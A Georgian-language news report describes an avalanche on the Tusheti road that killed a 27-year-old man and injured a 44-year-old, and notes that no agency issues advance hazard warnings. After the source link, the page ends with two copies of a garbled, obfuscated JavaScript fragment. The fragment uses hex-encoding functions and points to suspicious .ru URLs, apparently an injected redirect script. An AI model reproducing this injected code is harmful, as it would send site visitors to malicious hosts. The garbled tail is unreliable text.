რამდენიმე საათის წინ თუშეთის გზაზე, ე.წ. ცოდვიაანთ ხევთან ზვავი ჩამოწვა და ქვეშ მოიყოლა ორი მამაკაცი. ერთ–ერთი მათგანი, ახმეტის რაიონის სოფელ ქისტაურში მცხოვრები 27 წლის ლევან ტ–შვილი ადგილზე გარდაიცვალა, მეორე, 44 წლის მამაკაცი კი დაშავებულია.
სასწრაფო სამედიცინო დახმარების ბრიგადამ დაშავებული თელავის რეფერალურ საავადმყოფოში გადაიყვანა. მას გულმკერდის ტრავმა აღენიშნება. მისი ჯანმრთელობის მდგომარეობა საშუალო სიმძიმისაა.
როგორც კახეთის საინფორმაციო ცენტრს ახმეტის მუნიციპალიტეტის გამგებლის მოადგილე ვაჟა ნასყიდაშვილმა განუცხადა, მის ხელთ არსებული ინფორმაციით, მამაკაცებმა ცხვარი გააცილეს და უკან ბრუნდებოდნენ, რა დროსაც გზაზე ზვავი ჩამოწვა. „ისინი მანქანიდან გადმოსულან და თოვლის გადახვეტა სცადეს. ამ დროს ზვავი კიდევ ჩამოწვა და ორივე ქვეშ მოიყოლა. სამწუხაროდ, ერთ–ერთი მათგანი დაიღუპა“, – განაცხადა გამგებლის მოადგილემ.
თუშეთის გზის გაწმენდითი სამუშაოები უკვე რამდენიმე კვირაა მიმდინარეობს, თუმცა მთაში ორი დღის წინ ისევ მოთოვა და სამუშაოები შეაფერხა. იმის მიუხედავად, რომ შირაქიდან თუშეთში მეცხვარეები უკვე ორი კვირაა ცხვარს მიერეკებიან და გზაზე არაერთ ადამიანს უწევს ფეხით და გაწმენდილ მონაკვეთზე ავტომობილით მოძრაობა, წინასწარ არცერთი უწყება არ ავრცელებს ხოლმე ინფორმაციას მოსალოდნელი საშიშროების შესახებ.
http://ick.ge/rubrics/society/27646-i.html
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “ekofact.wordpress.com”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482